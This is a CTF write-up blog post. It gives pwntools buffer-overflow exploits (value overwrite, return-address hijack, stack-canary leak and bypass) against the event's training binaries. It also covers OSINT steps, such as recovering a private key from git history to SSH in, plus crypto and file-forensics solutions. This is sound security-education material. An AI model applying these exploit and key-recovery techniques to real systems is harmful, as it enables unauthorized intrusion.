Despite entering as a team of 4, the CTF was just completed by myself and my good friend featherbear! We managed to claim first place, being ahead of second place by 20 points.
Checkout his writeup here <3
These challenges were done by examining the disassembly using Binary Ninja.
Key observations:
getsis used - possible overflow vulnerability- to take the winning branch, the value at [ebp-0xc] must equal 0x37333331
- buffer starts being written at [ebp-0x20]
Overview:
- pad the payload to allow 0x37333331 to be written at [ebp-0xc]
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7004)
payload = b''
# pad until check location
payload += b'A' * (0x20-0xC)
# insert required value
payload += p32(0x37333331)
p.sendline(payload)
p.interactive()Key observations:
- 1337%256 = 57 ->
exitmust be given 57 as its argument getsis used invuln- possible overflow vulnerability- buffer starts being written at [ebp-0x26]
Overview:
- pad the payload to until the return address location at [ebp+4]
- overwrite the return address with the address of where
exitis called - append the required value afterwards to set is as the argument
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7006)
payload = b''
# pad until the return address
payload += b'A' * (0x26+0x4)
# overwrite return address with address when
# exit is called
payload += p32(0x8049219)
# set the required argument value
payload += p32(57)
p.sendline(payload)
p.interactive()Key observations:
getsis used inlol- possible overflow vulnerability- buffer starts being written at [ebp-0x20]
- canary check occurs with a value at [ebp-0xc]
- canary value is printed out
winfunction is provided
Overview:
- obtain the given canary value
- pad the payload to until the canary location at [ebp-0xc]
- rewrite the canary
- pad the rest of the payload
- overwrite the return address with the win function
Code:
from pwn import *
p = remote('pwn.ctf.unswsecurity.com', 7005)
# obtain the canary value
p.recvuntil('hi\n')
canary = p.recvuntil('\n', drop=True)
canary = b'0x' + canary
canary = int(canary, 16)
payload = b''
# pad until the canary
payload += b'A' * (0x20-0xC)
# overwrite the canary
payload += p32(canary)
# pad till the return address
payload += b'A' * 0xC
# overwrite return address
payload += p32(0x80491c6)
p.sendline(payload)
p.interactive()Key observations:
- location was at 33-39 hunter st
- clue was frankie the fox
Overview:
- frankie's pizza is on hunter st
Key observations:
- required: twitter
- team page has a commented section about a guy named Robert Northcote
- robots.txt file had a path...
Overview:
- path from robots.txt lead to rob's 'personal' page
- link to his twitter was there
Key observations:
- required: github
- no other links on the website
- names of staff are on the team page
Overview:
- search on github for the staff
- charlie warner - CEO of Dorf can be found, alongside his username
Key observations:
- CEO has starred a repo from the fired employee
- repo contains dorf site files
Overview:
- check previous commits
- config file was once pushed and then removed -
bf99018 - private key was also once pushed and then removed -
5e702ce - ssh into server to obtain the flag
Key observations:
- anagram
Overview:
- used an anagram solver
Key observations:
- possible caesar cypher?
Overview:
- it was not a caesar cypher
- used a vigenere decoder set with nowing a plain text word
- found possible solutions - guess and check
An online hex editor was used to modify the given png file.
Key observations:
- first four bytes of the header are overwritten
Overview:
- change the first four bytes to
89 50 4E 47which are the first bytes of the PNG header signature - save the file and it should now be able to be opened
Key observations:
- what?
Overview:
filewas used to determine the correct file type- a.notazip was opened as a zip
- a.png was opened as a pdf
Key observations:
- hint lead me to this online steganography decoder
- challenge description seemed to be a pangram
Overview:
- used the decoder to find the string required
- pangram was used to solve the substitution cypher